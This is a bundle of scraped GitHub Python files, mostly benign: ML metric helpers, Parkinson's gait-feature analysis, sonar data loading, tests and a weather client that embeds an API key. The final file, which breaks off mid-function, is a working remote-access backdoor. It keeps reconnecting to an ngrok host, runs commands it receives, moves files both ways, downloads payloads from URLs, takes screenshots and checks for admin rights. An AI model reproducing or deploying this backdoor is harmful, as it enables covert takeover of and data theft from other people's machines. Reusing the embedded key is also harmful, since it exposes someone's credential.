"usage_type": "call"
},
{
"api_... |
27770003302 | import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import sklearn
import xgboost
from sklearn import metrics
from decimal import *
import graphviz
'''
新細明體:PMingLiU
細明體:MingLiU
標楷體:DFKai-SB
黑体:SimHei
宋体:SimSun
新宋体:NSimSun
仿宋:FangSong
楷体:KaiTi
仿宋_GB2312:FangSong_GB2312
楷体_GB2312:KaiTi_GB2312
微軟正黑體:Microsoft JhengHei
微软雅黑体:Microsoft YaHei
————————————————
metrics.confusion_matrix(y_true, y_pred, labels=None, sample_weight=None)
metrics.accuracy_score(y_true,y_pred)
metrics.average_precision_score(y_true, y_score, average='macro', sample_weight=None)
metrics.precision_score(y_true, y_pred, labels=None, pos_label=1, average='binary',)
metrics.recall_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
metrics.f1_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
precision,recall,thresholds=metrics.precision_recall_curve(y_true,y_pred)
>>> plt.plot(recall, precision)
fpr,tpr,thresholds = metrics.roc_curve(y_true, y_ pred, pos_label=None, sample_weight=None, drop_intermediate=True)
>>> plt.plot(fpr,tpr)
metrics.roc_auc_score(y_true, y_pred, average='macro', sample_weight=None)
metrics.auc(fpr, tpr)
metrics.mean_absolute_error(y_true, y_pred, sample_weight=none, multioutput='uniform_average')
metrics.mean_squared_error(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
metrics.r2_score(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
For multi-class problems the average argument selects how per-label scores are combined:
'macro': compute the metric for each label and take the unweighted mean; class imbalance is ignored.
'weighted': compute the metric for each label and take the mean weighted by the number of true instances of each label.
'micro': count TP, FN and FP globally, then compute the score from those totals.
'''
def classificationModel(y_true,y_pred):
nameValueDict={}
#confusion matrix
confusionMatrix = metrics.confusion_matrix(y_true, y_pred)
#accuracy
accuracyScore = metrics.accuracy_score(y_true, y_pred)
#precision
precisionScore = metrics.precision_score(y_true, y_pred,average=None)
#recall
recallScore = metrics.recall_score(y_true, y_pred,average=None)
#f1 score (a binary average is only valid for two-class problems)
# None, 'micro', 'macro', 'weighted'
f1Score = metrics.f1_score(y_true, y_pred,average=None)
nameValueDict.update({})
#PR curve
precision,recall,thresholds = metrics.precision_recall_curve(y_true,y_pred)
plt.plot(recall, precision)
fpr, tpr, thresholds = metrics.roc_curve(y_true, y_pred,drop_intermediate = True)
# >>> plt.plot(fpr, tpr)
rocAucScore = metrics.roc_auc_score(y_true, y_pred)
aucArea = metrics.auc(fpr, tpr)
nameValueDict.update({'accuracyScore':accuracyScore})
nameValueDict.update({'precisionScore':precisionScore})
nameValueDict.update({'recallScore':recallScore})
# nameValueDict.update({'f1Score':f1Score})
nameValueDict.update({'auc':metrics.auc(fpr, tpr)})
nameValueDict.update({'accuracyScore':accuracyScore})
nameValueDict.update({'aucArea':aucArea})
return nameValueDict
def regressionModel(y_true,y_pred):
nameValueDict = {}
MAE = metrics.mean_absolute_error(y_true, y_pred)
MSE = metrics.mean_squared_error(y_true, y_pred)
r2 = metrics.r2_score(y_true, y_pred)
nameValueDict.update({'MAE':MAE})
nameValueDict.update({'MSE':MSE})
nameValueDict.update({'r2':r2})
return nameValueDict
def entU(u):
return [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
#conditional entropy
def uConditionV(u,v):
entu = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
entv = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(v, return_counts=True)[1]]][0]
# v is the explanatory (conditioning) variable
vid, vct = np.unique(v, return_counts=True)
# conditional information (entropy of u within each value of v)
vidEntropy = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u[v == i], return_counts=True)[1] for i in vid]]
#conditional entropy H(u|v)
entUconditonV= np.sum(np.array(vidEntropy) * (vct / np.sum(vct)))
return entUconditonV
#information gain
def gainuv(u,v):
return entU(u) - uConditionV(u,v)
def gainRatio(u, v):
return gainuv(u,v) / entU((v))
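# --- Illustrative example (a sketch, not part of the original module). ---
# With y = [0, 0, 1, 1] and x = [0, 0, 1, 1] the split on x is perfectly
# informative, so the gain equals the entropy of y (1 bit) and the gain ratio is 1:
# _y = np.array([0, 0, 1, 1]); _x = np.array([0, 0, 1, 1])
# print(entU(_y))             # 1.0
# print(uConditionV(_y, _x))  # 0.0
# print(gainuv(_y, _x))       # 1.0
# print(gainRatio(_y, _x))    # 1.0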
def display_version():
print('np.version : ',np.__version__)
print('pd.version : ',pd.__version__)
print('matplotlib.version : ',matplotlib.__version__)
print('sklearn.version : ',sklearn.__version__)
print('xgboost.version : ',xgboost.__version__)
print('graphviz.version',graphviz.__version__)
display_version()
#data inspection tool
def overview(data):
print('\n======================= data overview =======================\n')
print('\nnumber of duplicate rows : ',data.duplicated().sum(axis=0))
print('duplicate records:')
print(data[data.duplicated()])
print('\noverall missing-value summary : ')
print('total records : ',data.shape[0])
print('\nnon-null count per column:')
print(data.notnull().sum())
print('\nnull count per column:')
print(data.isnull().sum())
print('\nmissing ratio per column')
print(data.isnull().mean())
print('\nrows with missing values\n')
print(data.loc[data.isnull().sum(axis=1)>0,:])
print('\ncolumns with missing values\n')
print(data.loc[:,data.isnull().sum(axis=0)>0])
print('\nmissing region [missing rows + missing columns]\n')
print(data.loc[data.isnull().sum(axis=1) > 0, data.isnull().sum(axis=0) > 0])
print('\n\n')
print('\nfor each column, the row indices of its missing values\n')
for i in data.columns:
print(i,' : ',list(np.where(pd.isna(data[i]))[0]))
print('\n\n')
def basicOperate(data):
print('\n\n')
print('\ndrop duplicate rows\n')
data.drop_duplicates(inplace=True)
print('\n\n')
print('\n\n')
print('\n\n')
def dropRank(data,thresh):
threshold = thresh
print('showing rows with more than {} null values; these rows will be dropped'.format(data.shape[1] - threshold))
print(data.loc[data.isnull().sum(axis=1) > data.shape[1] - threshold])
print('=======================================')
print(data.loc[data.isnull().sum(axis=1) == data.shape[1] - threshold])
print('=======================================')
print('showing rows with at least {} non-null values; these rows are kept'.format(threshold))
print(data.dropna(thresh=threshold))
data.dropna(thresh=threshold,inplace=True)
# Gini index for a discrete predictor; x is the feature, y is the target flag
def giniC(x, y):
x_id, x_ct = np.unique(x, return_counts=True)
p_x = [ct / sum(ct) for ct in [np.unique(x, return_counts=True)[1]]]
gini = [1 - np.sum(p ** 2) for p in
[ct / sum(ct) for ct in [np.unique(y[x == i], return_counts=True)[1] for i in x_id]]]
return np.sum(np.array(p_x) * np.array(gini))
# Gini index for a continuous predictor; x is the feature, y is the target flag
def giniS(y, x):
# cast the values to float
x.astype(float)
# sort the values
sorted_x = np.sort(x)
split_point_list = []
split_point_gini = []
# candidate split points (midpoints between consecutive sorted values)
for i in range(0, len(sorted_x) - 1, 1):
split_point_list.append(np.mean([sorted_x[i], sorted_x[i + 1]]))
# compute the Gini index produced by each split point in turn
for i in split_point_list:
# after splitting, the predictor becomes binary
xi = pd.Series.copy(x)
xi[xi <= i] = 0
xi[xi > i] = 1
# weights (relative frequencies) of the two sides of the split
w_i = [[p for p in ct / np.sum(ct)] for ct in [np.unique(xi, return_counts=True)[1]]]
# the split groups
x_id, x_ct = np.unique(xi, return_counts=True)
# Gini of y within each side of the split
gini_x_id = [np.sum([(p - p ** 2) for p in ct / np.sum(ct)]) for ct in
[np.unique(y[xi == i], return_counts=True)[1] for i in x_id]]
# weighted Gini for this split point
gini = Decimal(str(np.sum(w_i * np.array(gini_x_id)))).quantize(Decimal('0.0000'),ROUND_HALF_UP)
split_point_gini.append(gini)
# pack results into a dict
split_point_gini_dict = dict(zip(split_point_list, split_point_gini))
return split_point_gini_dict
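# --- Illustrative example (a sketch, not part of the original module). ---
# giniS evaluates every midpoint between consecutive sorted values of x and
# returns {split_point: weighted Gini after splitting there}; the 6.0 split
# below separates the classes perfectly and therefore scores 0.
# _y = pd.Series([0, 0, 1, 1]); _x = pd.Series([1.0, 2.0, 10.0, 11.0])
# print(giniS(_y, _x))   # {1.5: ..., 6.0: Decimal('0.0000'), 10.5: ...}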
| kshsky/PycharmProjects | machinelearning/tools/mlTools.py | mlTools.py | py | 8,384 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.metrics.confusion_matrix",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "sklearn.metrics.accuracy_score",
"line_number": 57,
"usage_type": "call"
},
{
"a... |
37986696093 | """
This script performs the analysis for the Ga study
"""
# import libraries
import re
import tsfresh
import numpy as np
import pandas as pd
from pandas import ExcelWriter
from sklearn.preprocessing import LabelBinarizer
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("darkgrid")
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedShuffleSplit, train_test_split
from ml_models.LinearRegression import LinearRegressionCalculator
from ml_models.DecisionTreeRegression import DecisionTreeRegressionCalculator
from ml_models.RandomForestRegression import RandomForestRegressionCalculator
# import methods from other scripts / packages
from storage.DataLoader import data_loader
from feature_extraction.FFT import fft_extractor
from feature_extraction.abs_energy import AbsoluteEnergyCalculator
# Constant declarations
col_names = ['Time_sec', 'Sens_L1', 'Sens_L2', 'Sens_L3', 'Sens_L4', 'Sens_L5', 'Sens_L6', 'Sens_L7', 'Sens_L8',
'Sens_R1', 'Sens_R2', 'Sens_R3', 'Sens_R4', 'Sens_R5', 'Sens_R6', 'Sens_R7', 'Sens_R8', 'TF_L', 'TF_R']
"""
Main Controller
"""
def study_ga_controller(demographics_data):
group_1_data, group_2_data = split_group_data(demographics_data)
group_1_analysis(group_1_data, group_2_data)
# group_2_analysis(group_2_data)
def split_group_data(demographics_data):
group_1_data = demographics_data[demographics_data['Group'] == 1]
group_2_data = demographics_data[demographics_data['Group'] == 2]
return group_1_data, group_2_data
def print_newline():
print("")
def print_seperator():
print("--------------------------")
# ----------------------------------------------------- GROUP 1 ------------------------------------------------------ #
def group_1_analysis(group_1_data, group_2_data):
print_newline()
print("#####################################")
print("Group 1 Analysis:")
print("#####################################")
# Create Empty Dataframe
all_patient_dataframe = pd.DataFrame(
columns=['ID', 'Patient_Number', 'Study', 'Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4'])
df1 = pd.DataFrame([[np.nan] * len(all_patient_dataframe.columns)], columns=all_patient_dataframe.columns)
patient_data_loader = data_loader()
patient_data_file_paths = patient_data_loader.get_patient_file_paths()
group_1_2_data = group_1_data[['ID', 'Gender', 'HoehnYahr']].append(group_2_data[['ID', 'Gender', 'HoehnYahr']])
# all_patient_dataframe = GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1)
# all_patient_dataframe = pd.merge(all_patient_dataframe, group_1_2_data, how='left', on=['ID'])
# writer = ExcelWriter('Study_Ga_df.xlsx')
# all_patient_dataframe.to_excel(writer, 'Sheet1')
# writer.save()
all_patient_dataframe = pd.read_excel('Study_Ga_df.xlsx', sheet_name="Sheet1")
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
for train_index, test_index in split.split(all_patient_dataframe, all_patient_dataframe["HoehnYahr"]):
strat_train_set = all_patient_dataframe.loc[train_index]
strat_test_set = all_patient_dataframe.loc[test_index]
'''
print("Train Set:")
print_newline()
print(strat_train_set)
print_newline()
print("Test Set:")
print_newline()
print(strat_test_set)
'''
train_models(strat_train_set, strat_test_set)
def GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1):
for patient_file_path in patient_data_file_paths:
# Read patient data
patient_data = patient_data_loader.read_patient_data(patient_file_path)
filename_fields = extract_fields_from_filename(patient_data_loader, patient_file_path)
study_name = filename_fields.group(1)
patient_type = filename_fields.group(2)
patient_number = filename_fields.group(3)
data_file_number = filename_fields.group(4)
# plot_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# plot_zoomed_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# add empty row entry
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'left', data_file_number)
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'right', data_file_number)
return all_patient_dataframe
def extract_fields_from_filename(patient_data_loader, patient_file_path):
patient_filename = patient_data_loader.extract_file_name(patient_file_path)
pattern = "([A-Z][a-z])([A-Z][a-z])([\d]+)_([\d]+)"
fields_from_filename = re.match(pattern, patient_filename)
return fields_from_filename
def add_patient_data(all_patient_dataframe, patient_data, patient_number, patient_study, patient_type, foot, data_file_number):
all_patient_dataframe.loc[0, 'ID'] = patient_study + patient_type + patient_number
all_patient_dataframe.loc[0, 'Patient_Number'] = patient_number
all_patient_dataframe.loc[0, 'Study'] = patient_study
all_patient_dataframe.loc[0, 'Patient_Type'] = patient_type
all_patient_dataframe.loc[0, 'Foot'] = foot
all_patient_dataframe.loc[0, 'file_number'] = data_file_number
fft = fft_extractor()
abs_en = AbsoluteEnergyCalculator()
all_patient_dataframe = extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en)
return all_patient_dataframe
def train_models(strat_train_set, strat_test_set):
strat_train_set, strat_train_labels, strat_test_set, strat_test_labels = clean_sets(strat_train_set, strat_test_set)
print(strat_test_labels.describe())
print_seperator()
print("Linear Regression:")
lr_calculator = LinearRegressionCalculator()
lr_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Decision Tree Regression:")
tree_calculator = DecisionTreeRegressionCalculator()
tree_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Random Forest Regression:")
rf_calculator = RandomForestRegressionCalculator()
rf_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
def clean_sets(strat_train_set, strat_test_set):
data_col = ['Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4', 'Gender']
strat_train_set['Foot'] = strat_train_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_train_set['Foot'] = strat_train_set['Foot'].astype(int)
strat_test_set['Foot'] = strat_test_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_test_set['Foot'] = strat_test_set['Foot'].astype(int)
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].astype(int)
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].astype(int)
strat_train_labels = strat_train_set.loc[:, 'HoehnYahr']
strat_train_set = strat_train_set[data_col]
strat_test_labels = strat_test_set.loc[:, 'HoehnYahr']
strat_test_set = strat_test_set[data_col]
return strat_train_set, strat_train_labels, strat_test_set, strat_test_labels
# ----------------------------------------------------- GROUP 2 ------------------------------------------------------ #
def group_2_analysis(group_2_data):
print_newline()
print("#####################################")
print("Group 2 Analysis:")
print("#####################################")
# group_2_study_ga()
# group_2_study_ju()
# group_2_study_si()
# ------------------------------------------ FEATURE EXTRACTION METHODS --------------------------------------------- #
def find_gait_cycle(patient_data):
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['Sens_L1'] == 0) & (patient_data['Sens_L2'] == 0) &
(patient_data['Sens_L3'] == 0) & (patient_data['Sens_L4'] == 0) &
(patient_data['Sens_L5'] == 0) & (patient_data['Sens_L6'] == 0) &
(patient_data['Sens_L7'] == 0) & (patient_data['Sens_L8'] == 0)]['Time_sec'])
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['TF_L'] == 0)]['Time_sec'])
gait_cycle['Time_sec'] = gait_cycle['Time_sec'].astype(int)
gait_cycle = gait_cycle['Time_sec'].unique()
print_newline()
print_seperator()
print("Values with zero VGRF:\n")
print(gait_cycle)
print_seperator()
def extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en):
if foot == "left":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'left')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_L']], 'TF_L')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_L']], 'TF_L', all_patient_dataframe)
elif foot == "right":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'right')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_R']], 'TF_R')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_R']], 'TF_R', all_patient_dataframe)
return all_patient_dataframe
def add_foot_coeffs(all_patient_dataframe, fft, patient_data, feet_type):
if feet_type == 'left':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_L']], 'TF_L')
elif feet_type == 'right':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_R']], 'TF_R')
else:
raise ValueError("add_foot_coeffs() : Wrong value supplied")
all_patient_dataframe.loc[0, 'coeff_1'] = foot_coeff['coeff_1__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_2'] = foot_coeff['coeff_2__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_3'] = foot_coeff['coeff_3__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_4'] = foot_coeff['coeff_4__attr_"real"']
return all_patient_dataframe
def extract_eda_features(patient_data, col_name, all_patient_dataframe):
all_patient_dataframe.loc[0, 'Median'] = tsfresh.feature_extraction.feature_calculators.median(patient_data[col_name])
all_patient_dataframe.loc[0, 'Max'] = tsfresh.feature_extraction.feature_calculators.maximum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Min'] = tsfresh.feature_extraction.feature_calculators.minimum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Skewness'] = tsfresh.feature_extraction.feature_calculators.skewness(patient_data[col_name])
all_patient_dataframe.loc[0, 'Std'] = tsfresh.feature_extraction.feature_calculators.standard_deviation(patient_data[col_name])
all_patient_dataframe.loc[0, 'Variance'] = tsfresh.feature_extraction.feature_calculators.variance(patient_data[col_name])
return all_patient_dataframe
# -------------------------------------------------- PLOTTING METHODS ------------------------------------------------ #
def plot_patient_data(patient_df, x_col_name, y_col_name, plot_title):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(plot_title)
plt.show()
def plot_zoomed_patient_data(patient_df, x_col_name, y_col_name, plot_title):
zoomed_time_data = patient_df[patient_df[x_col_name] < 20]
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=zoomed_time_data)
ax.set_title(plot_title)
plt.show()
def plot_sensor_data(patient_df, x_col_name, y_col_name, sensor_name):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(sensor_name + "reading over time")
plt.show()
| emilymacq/Project-Clear-Lungs | Parkinsons_ML/main/Study_Ga.py | Study_Ga.py | py | 12,820 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "seaborn.set_style",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"... |
34366380953 | from scripts.hackerrank.isLeapYear import is_leap, is_leap2, is_leap3, is_leap4
class Test:
test_cases = [
[2004, True],
[2008, True],
[2012, True],
[2016, True],
[2005, False],
[2009, False],
[2013, False],
[2017, False],
]
testable_functions = [
is_leap, is_leap2, is_leap3, is_leap4
]
def test_is_leap(self):
for f in self.testable_functions:
for case, expected in self.test_cases:
assert expected == f(case)
| TrellixVulnTeam/learning_to_test_code_BL81 | tests/hackerrank/test_isLeapYear.py | test_isLeapYear.py | py | 560 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scripts.hackerrank.isLeapYear.is_leap",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "scripts.hackerrank.isLeapYear.is_leap2",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "scripts.hackerrank.isLeapYear.is_leap3",
"line_number": 17,
... |
43314571963 | import requests
def getweather(city):
api = "96e3cd3e19571466a39662b984eec5f1"
server = "https://api.openweathermap.org/data/2.5/weather"
request = f"{server}?q={city}&appid={api}"
output = requests.get(request)
if output.status_code == 200:
weather_data = output.json()
weather = weather_data["weather"][0]["main"]
description = weather_data["weather"][0]["description"]
temperature = str(round(weather_data["main"]["temp"] - 273.15, 1)) + " °C"
pressure = str(round(weather_data["main"]["pressure"] * 100 * 0.00750063755419211, 1)) + " mmHg"
output_weather = \
f"""Weather: {weather}, {description},
t°: {temperature},
Pressure: {pressure}"""
return f"{output_weather}"
else:
return "City not found"
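# A minimal usage sketch (not part of the original module); "London" is only an
# example city, and the request still needs a valid API key and network access.
if __name__ == "__main__":
    print(getweather("London"))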
| XBOPb/Projects | API_Weather_App/weatherAPI.py | weatherAPI.py | py | 821 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
}
] |
19530926102 | """
Projeto Marinha do Brasil
Autor: Pedro Henrique Braga Lisboa (pedro.lisboa@lps.ufrj.br)
Laboratorio de Processamento de Sinais - UFRJ
Laboratorio de de Tecnologia Sonar - UFRJ/Marinha do Brasil
"""
from __future__ import print_function, division
import os
import h5py
import warnings
import numpy as np
import scipy.io.wavfile as wav
import soundfile as sf
def load_raw_data(input_db_path, verbose=0):
"""
Loads sonar audio datafiles on memory.
This function returns a nested hashmap associating each run's audio data with its
class and filename. The audio information is composed of
the frames stored in a numpy array and the sample rate reported by the file.
E.g. for database '4classes' the returned dictionary will be set like:
ClassA:
navio10.wav:
signal: np.array
sample_rate: np.float64
navio11.wav:
signal: np.array
sample_rate: np.float64
ClassB:
navio20.wav:
...
navio21.wav:
...
...
...
params:
input_db_path (string):
path to database folder
return (SonarDict):
nested dictionary in which the basic unit contains
a record of the audio (signal key) in np.array format
and the sample_rate (fs key) stored in floating point.
The returned object also contains a method for applying
functions over the runs (see SonarDict.apply).
The mapping associates each (signal, fs) record with the
corresponding run name.
"""
if verbose:
print('Reading Raw data in path %s' % input_db_path)
class_folders = [folder for folder in os.listdir(input_db_path)
if not folder.startswith('.')]
raw_data = dict()
for cls_folder in class_folders:
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
if not runfiles: # No files found inside the class folder
if verbose:
print('Empty directory %s' % cls_folder)
continue
if verbose:
print('Reading %s' % cls_folder)
runfiles = os.listdir(os.path.join(input_db_path, cls_folder))
runpaths = [os.path.join(input_db_path, cls_folder, runfile)
for runfile in runfiles]
runfiles = [runfile.replace('.wav', '') for runfile in runfiles]
audio_data = [read_audio_file(runpath) for runpath in runpaths]
raw_data[cls_folder] = {
runfile: {'signal': signal, 'fs': fs}
for runfile, (signal, fs) in zip(runfiles, audio_data)
}
return SonarDict(raw_data)
# class RunRecord(dict):
# """
# Basic dicionary for storing the runs
# binding the data with its respective metadata(sample rate)
# This wrapper was made to standardize the keynames.
# """
# def __init__(self, signal, fs):
# self.__dict__['signal'] = signal
# self.__dict__['fs'] = fs
# def __getitem__(self , k):
# return self.__dict__[k]
class SonarDict(dict):
"""
Wrapper for easy application of preprocessing functions
"""
def __init__(self, raw_data):
super(SonarDict, self).__init__(raw_data)
@staticmethod
def from_hdf5(filepath):
f = h5py.File(filepath, 'r')
raw_data = SonarDict.__level_from_hdf5(f)
f.close()
return SonarDict(raw_data)
@staticmethod
def __level_from_hdf5(group_level):
level_dict = dict()
for key in group_level.keys():
if isinstance(group_level[key], h5py._hl.group.Group):
level_dict[key] = SonarDict.__level_from_hdf5(group_level[key])
elif isinstance(group_level[key], h5py._hl.dataset.Dataset):
# if isinstance(group_level[key].dtype, 'float64')
level_dict[key] = group_level[key][()]
else:
raise ValueError
return level_dict
def to_hdf5(self, filepath):
f = h5py.File(filepath, 'w')
SonarDict.__level_to_hdf5(self, f, '')
f.close()
@staticmethod
def __level_to_hdf5(dictionary_level, f, dpath):
for key in dictionary_level.keys():
ndpath = dpath + '/%s' % key
if isinstance(dictionary_level[key], dict):
SonarDict.__level_to_hdf5(dictionary_level[key], f, ndpath)
else:
if isinstance(dictionary_level[key], np.ndarray):
dtype = dictionary_level[key].dtype
else:
dtype = type(dictionary_level[key])
f.create_dataset(ndpath, data=dictionary_level[key], dtype=dtype)
def apply(self, fn,*args, **kwargs):
"""
Apply a function over each run of the dataset.
params:
fn: callable to be applied over the data. Receives at least
one parameter: dictionary (RunRecord)
args: optional params to fn
kwargs: optional named params to fn
return:
new SonarDict object with the processed data. The inner structure
of the signal, sample_rate pair is maintained, which allows for chaining
several preprocessing steps.
"""
sonar_cp = self.copy()
return SonarDict({
cls_name: self._apply_on_class(cls_data, fn, *args, **kwargs)
for cls_name, cls_data in sonar_cp.items()
})
def _apply_on_class(self, cls_data, fn, *args, **kwargs):
"""
Apply a function over each run signal of a single class.
Auxiliary function for applying over the dataset
"""
return {
run_name: fn(raw_data, *args, **kwargs)
for run_name, raw_data in cls_data.items()
}
def read_audio_file(filepath):
signal, fs = sf.read(filepath)
return signal, fs
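# --- Illustrative usage (a sketch, not part of the original module). ---
# "4classes" is a placeholder database folder; point it at a real dataset.
# sonar_data = load_raw_data("4classes", verbose=1)
# # Apply a per-run step while keeping the {'signal': ..., 'fs': ...} structure:
# normalized = sonar_data.apply(
#     lambda run: {'signal': run['signal'] / np.abs(run['signal']).max(), 'fs': run['fs']})
# normalized.to_hdf5("4classes_normalized.hdf5")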
| pedrolisboa/poseidon | poseidon/io/offline.py | offline.py | py | 6,116 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 63,
... |
3118375238 | import torch.optim as optim
ADADELTA_LEARNING_RATE = 0.05
ADADELTA_MOMENTUM = 0.9
ADADELTA_WEIGHT_DECAY = 0.005
def get_adadelta_halnet(halnet,
momentum=ADADELTA_MOMENTUM,
weight_decay=ADADELTA_WEIGHT_DECAY,
learning_rate=ADADELTA_LEARNING_RATE):
return optim.Adadelta(halnet.parameters(),
rho=momentum,
weight_decay=weight_decay,
lr=learning_rate)
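# Illustrative usage (a sketch, not part of the original module); "halnet_model"
# stands for any torch.nn.Module exposing .parameters():
# optimizer = get_adadelta_halnet(halnet_model, learning_rate=0.05)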
| pauloabelha/muellerICCV2017 | optimizers.py | optimizers.py | py | 520 | python | pt | code | 2 | github-code | 36 | [
{
"api_name": "torch.optim.Adadelta",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 11,
"usage_type": "name"
}
] |
28436305539 | import socket
import subprocess
import json
import os
import base64
import sys
import shutil
import time
import requests
from termcolor import colored
from mss import mss
def reliable_send(data):
json_data=json.dumps(data)
sock.send(json_data.encode('utf-8'))
def reliable_recv():
data=''
while True:
try:
data=data+sock.recv(1024).decode('utf-8')
return json.loads(data)
except ValueError:
continue
def download(url):
get_res=requests.get(url)
file_name=url.split("/")[-1]
with open(file_name,"wb") as file:
file.write(get_res.content)
def screenshot():
with mss() as screenshot:
screenshot.shot()
def is_admin():
global admin
try:
temp=os.listdir(os.sep.join([os.environ.get('SystemRoot','C:\windows'),'temp']))
except:
admin="[!!] user privileges"
else:
admin="[+] administrator privileges"
def connection():
while True:
time.sleep(7)
try:
sock.connect(('0.tcp.ngrok.io',11174))
shell()
except:
connection()
def shell():
while True:
command=reliable_recv()
cmd=str(command)
if cmd=="":
break
print("Command from the server: "+cmd)
if cmd.lower()=="q":
print("socket closed")
break
elif command=="help":
help_options=''' download path --> download a file from target pc
upload path --> upload a file to target pc
get url --> download a file from the internet
check --> checking privileges
screenshot --> screenshot target pc
help --> help options
start path --> starting a program
q --> stop the shell
'''
reliable_send(help_options)
elif cmd[:2] =="cd" and len(cmd)>2:
try:
os.chdir(cmd[3:])
except:
continue
elif command[:8]=="download":
with open(command[9:],"rb") as file:
file_data=base64.b64encode(file.read())
reliable_send(file_data.decode())
elif command[:6]=="upload":
with open(command[7:],"wb") as fle:
fle_data=reliable_recv()
fle.write(base64.b64decode(fle_data))
elif command[:3] =="get":
try:
download(command[4:])
reliable_send(colored('[+] Downloaded file with the given url','green'))
except:
reliable_send(colored('[+] File Downloaded failed','red'))
elif command[:5]=="start" and len(command[6:])>13:
lst=command[6:].split(".")
try:
subprocess.Popen(lst[-1][:len(lst[-1])-1],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:5] =="start":
try:
subprocess.Popen(command[6:],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:10]=="screenshot":
try:
screenshot()
with open('monitor-1.png','rb') as img:
img_data=base64.b64encode(img.read())
img_data=img_data.decode('utf-8')
reliable_send(img_data)
os.remove('monitor-1.png')
except:
failed="[!!] failed to take screenshot"
reliable_send(failed)
elif command[:5]=="check":
try:
is_admin()
